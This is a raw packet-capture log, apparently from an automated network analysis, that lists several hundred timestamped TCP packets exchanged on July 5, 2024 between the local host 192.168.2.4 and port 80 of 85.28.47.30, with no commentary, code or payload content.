                                                                Jul 5, 2024 04:23:17.834340096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834362030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834372044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834377050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834382057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834392071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834402084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834412098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834420919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.834422112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834439993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.834450960 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.845140934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845160961 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845179081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845194101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.845206976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.845220089 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.845323086 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845335007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845345020 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845355988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.845375061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.845391035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918556929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918571949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918582916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918638945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918648958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918649912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918659925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918672085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918679953 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918682098 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918694973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918720007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918737888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918751001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918761015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918771982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918778896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918800116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918834925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918838024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918847084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.918883085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.918966055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919002056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919048071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919085026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919118881 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919130087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919138908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919157028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919182062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919286966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919296980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919306993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919317007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919322014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919332027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919346094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919351101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919394970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919405937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919418097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919433117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919444084 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919527054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919538975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919564962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919652939 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919663906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919672966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919682980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919689894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919692993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919703960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919712067 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919714928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.919735909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.919748068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.923677921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923690081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923700094 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923732042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.923751116 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923757076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.923763037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923774958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923784971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923798084 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.923825026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.923966885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923985958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.923996925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924005032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924009085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924024105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924035072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924050093 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924101114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924112082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924120903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924132109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924139023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924143076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924166918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924180984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924202919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924215078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924218893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924223900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924252033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924254894 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924263954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924276114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924288988 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924313068 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924371958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924382925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924391985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924401999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924412012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924416065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924420118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924426079 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924427986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924443007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924457073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924478054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924487114 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924494982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924505949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924515963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924531937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924561977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924587965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924597979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924607992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924618959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924624920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924633026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924664021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924679995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924693108 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924701929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924711943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924715996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924727917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924746990 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924783945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924845934 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924856901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924881935 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924894094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924916029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924926996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924943924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924952984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924961090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.924967051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924972057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924982071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.924998999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925005913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925005913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925009012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925020933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925024986 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925040960 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925046921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925054073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925057888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925064087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925092936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925092936 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925105095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925116062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925127983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925128937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925156116 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925158978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925170898 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925170898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925184965 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925194979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925196886 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925208092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925223112 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925236940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925236940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925251961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925271988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925282955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925318956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925345898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925357103 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925369978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.925386906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.925405979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.941692114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941704035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941720963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941730022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941739082 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941749096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941761017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.941766977 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.941827059 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013545036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013556004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013561010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013601065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013612032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013621092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013627052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013638973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013664007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013675928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013870001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013880968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013895988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013906956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013906956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013921976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013922930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013936043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013936043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013951063 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013952017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013961077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013967037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.013973951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.013979912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014000893 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014024019 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014200926 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014211893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014220953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014239073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014249086 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014250994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014265060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014266014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014276981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014287949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014295101 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014298916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014309883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014328003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014328003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014347076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014589071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014605999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014621019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014631033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014640093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014641047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014652014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014659882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014664888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014674902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014678001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014689922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014708042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014729023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014730930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014739990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014750957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014765024 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014767885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014780998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014790058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014791012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014796972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014797926 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014825106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014832973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014837027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014847994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014858007 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014882088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.014944077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014957905 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014969110 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014978886 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014991045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.014995098 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015010118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015029907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015080929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015095949 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015105009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015115023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015119076 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015125990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015136003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015141010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015172958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015496016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015506029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015516043 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015547991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015566111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015633106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015645027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015655041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015666008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015670061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015676975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015697956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015733004 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015763044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015774012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015784025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015794992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015806913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015810013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015822887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015834093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015842915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015844107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015856028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015862942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015870094 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015875101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015887022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015897989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015914917 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015922070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015938044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.015979052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.015990019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016000032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016010046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016016006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016020060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:18.016021013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:18.016089916 CEST4973280192.168.2.485.28.47.30
